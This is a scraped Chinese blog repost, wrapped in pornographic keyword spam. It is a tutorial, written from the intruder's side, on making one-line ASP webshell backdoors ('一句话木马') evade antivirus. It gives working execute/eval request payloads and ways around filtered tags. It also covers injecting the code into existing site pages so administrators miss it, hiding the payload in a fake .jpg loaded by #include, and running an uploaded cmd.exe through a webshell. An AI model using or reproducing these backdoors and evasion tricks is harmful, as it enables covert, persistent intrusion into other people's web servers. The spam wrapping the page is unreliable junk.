日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

一句话木马的免杀(转)

發布時間:2023/12/29 综合教程 26 生活家
生活随笔 收集整理的這篇文章主要介紹了 一句话木马的免杀(转) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

在入侵過程中,我們常常會遇到這樣的問題,因為大馬太大,而不能上傳,怎么辦,這個時候就只能用小馬來輔助,但是,小馬的語句又被殺,今天我們來說說一句話小馬的免殺方法。
眾所周之,一句話的語句是<%execute request("密碼")%>
1.入侵過程中<%,%>符號被過濾怎么辦?我們可以想辦法避開<%,%>
<scriptlanguage=VBScript runat=server>execute request("cmd")</Script>
2.網絡中流傳的最小的木馬代碼是<%eval request("#")%> 如過連這也寫不下怎么辦?將木馬分開寫就好了!
<%Y=request("x")%> <%execute(Y)%>


這樣分開寫提交到數據庫就沒問題了!
不過,在ACCESS數據庫中新增加的數據物理位置是在舊數據之前的,所以要先寫<%execute(Y)%>部分。寫好后在客戶端寫密碼時除了填寫"x"以外的任何字符都可以,如果填了"x"就會出錯!
3.插入一句話容易爆錯,例如

Sub unlockPost()
Dim id,replyid,rs,posttable
id=Request("id")
replyid=Request("replyid")
If Not IsNumeric(id) or id="" Then
寫成
Sub unlockPost(<%eval request("#")%>)
Dim id,replyid,rs,posttable
id=Request("id")
replyid=Request("replyid")
If Not IsNumeric(id) or id="" Then
就可以了,也可以寫成帶容錯語句的格式!!
<%if request("cmd")<>""then execute request("cmd")%>
4.一句話木馬到兩句話木馬的轉型!
一句話木馬服務端原型:<%execute request("value")%> ,
變形后:<%On Error Resume Next execute request("value")%> ,
至于為什么要用兩句話木馬呢,是由于使我們的后門更加隱蔽。
我也試過用一句話插入WellShell的某個ASP文件里面,可是訪問時經常出錯,而插入兩句話木馬服務端卻可以正常訪問了,對站點的頁面無任何影響。
這樣就達到了隱蔽性更強的目的了,他管理員總不會連自己的網頁文件都刪了吧。
現在我的WellShell都有這樣的后門.選擇要插入兩句話木馬的ASP文件要注意,選一些可以用IE訪問的ASP文件,不要選conn.asp這樣的文件來插入。當然,連接兩句話木馬的客戶端仍然是用一句木馬的客戶端,不用修改。

5.一句話免殺:
一:變形法
比如:eval(request("#"))這樣的馬兒呢,一般情況下是不被殺的。但實際上,經常殺毒軟件會把eval(request列為特征碼。所以我們變形一下
E=request("id")
eval(E)
這樣可達到免殺的目的。
例如:<%execute request("1")%>變形后:
<%E=request("1")
execute E%>
當然,這種變形是最好做的。
介紹第二種方法:因為很多管理員很聰明,它會檢查ASP文件中的execute和eval函數。所以呢,不管你怎么反編譯,它最終總是要用其中的一個函數 來解釋運行,所以還是被發現了。好么,我們用外部文件來調用。建一個a.jpg或者任何不被發現的文件后綴或文件名。寫入 execute(request("#"))當然,你可以先變形后現放上去。然后在ASP文件中插入
<!--#include file="a.jpg" -->
來引用它,即可。
不過,管理員可以通過對比文件的方式找到修改過的文件,不過這種情況不多
6.在WEBSHELL中使用命令提示
在 使用ASP站長助手6.0時點擊命令提示符顯示“沒有權限”的時候,可以使用ASP站長助手上傳CMD.exe到你的WEBSHELL目錄(其它目錄也 行,把上傳以后的CMD.exe絕對路徑COPY出來),再修改你的WEBSHELL找到調用CMD.EXE的代碼。原來的代碼如下
.exec("cmd.exe /c "&DefCmd).stdout.readall
修改為
.exec("你想上傳的cmd.exe絕對路徑" /c"&DefCmd).stdout.readall
比如你上傳到的目錄是D:\web\www\cmd.exe,那么就修改成
.exec("D:\web\www\cmd.exe /c"&DefCmd).stdout.readall


@####################################################

我是一個不被神眷の男人~

####################################################@

總結

以上是生活随笔為你收集整理的一句话木马的免杀(转)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 久久激情影院 | 国产成人精品免费 | 国产在线视频资源 | 亚洲精品乱码久久久久 | 国产精品腿扒开做爽爽爽挤奶网站 | 国产91久久精品一区二区 | 国产在线观看xxx | 久久精品视频国产 | 国产精品美女久久久久图片 | 亚洲av永久无码国产精品久久 | 一区国产在线 | 久草免费福利视频 | 色xxxxxx | 亚洲字幕在线观看 | 天天做夜夜爽 | 久久精品7 | av免费观看网| 欧美日本成人 | а√天堂资源官网在线资源 | 一本色道久久88综合日韩精品 | 日本少妇电影 | 久久综合中文 | 麻豆成人久久精品一区二区三区 | 法国空姐 在线 | 女人私密又肥又大 | 国产无玛 | 麻豆91精品 | 绯色av一区 | 成人午夜视频精品一区 | 动漫精品一区二区三区 | 女人裸体又黄 | 国产女主播自拍 | 别揉我奶头一区二区三区 | 日本少妇xxx | 中文字幕在线日亚洲9 | 欧美激情欧美激情在线五月 | 日日爱夜夜爱 | 国产高潮在线观看 | 日韩精品中文字幕在线 | 欧美日国产 | 日韩第四页 | 特级西西444www高清大胆免费看 | 中国老熟妇自拍hd发布 | 欧美韩日精品 | 人人人妻人人澡人人爽欧美一区 | 日本综合色 | 一区二区久久精品66国产精品 | 婷婷一区二区三区四区 | 一区二区日韩欧美 | 乌克兰黄色片 | 日韩区在线 | 天堂成人国产精品一区 | 久久影视一区二区 | 国产成人精品久久二区二区91 | 国产丝袜久久 | 大桥未久在线视频 | 亚洲成人av电影网站 | 深夜福利1000 | 色婷婷久久综合中文久久蜜桃av | 日韩欧美国产精品综合嫩v 国产小毛片 | 秋霞av一区二区三区 | 成人三级电影网站 | 久久人人爽人人人人片 | 亚洲色成人一区二区三区小说 | 又大又长粗又爽又黄少妇视频 | 欧美性猛交乱大交3 | 老熟女高潮喷水了 | 青青草国产成人99久久 | 美女精品在线观看 | 成人黄色片在线观看 | 亚洲AV无码国产日韩久久 | 99在线无码精品入口 | 亚洲av无码国产综合专区 | 日韩视频中文字幕 | 深夜福利电影 | 日本不卡一区二区在线观看 | 日本成人一区二区三区 | 日本大乳奶做爰 | 美女视频在线免费观看 | 老司机成人在线 | 日韩在线一 | 蜜臀av性久久久久蜜臀aⅴ流畅 | 国产精品成人aaaaa网站 | 中国一级免费毛片 | 欧美性爱视频久久 | 狠狠躁| 国产 日韩 欧美 精品 | 91一区二区三区在线观看 | 婷婷精品一区二区三区 | 一曲二曲三曲在线观看中文字幕动漫 | 亚洲成年人网站在线观看 | 国产自产21区 | 国产传媒在线 | www.亚洲黄色| 国产视频手机在线播放 | 六月丁香色婷婷 | 97色婷婷 | 啪啪免费 | 99热这里只有精品1 亚洲人交配视频 |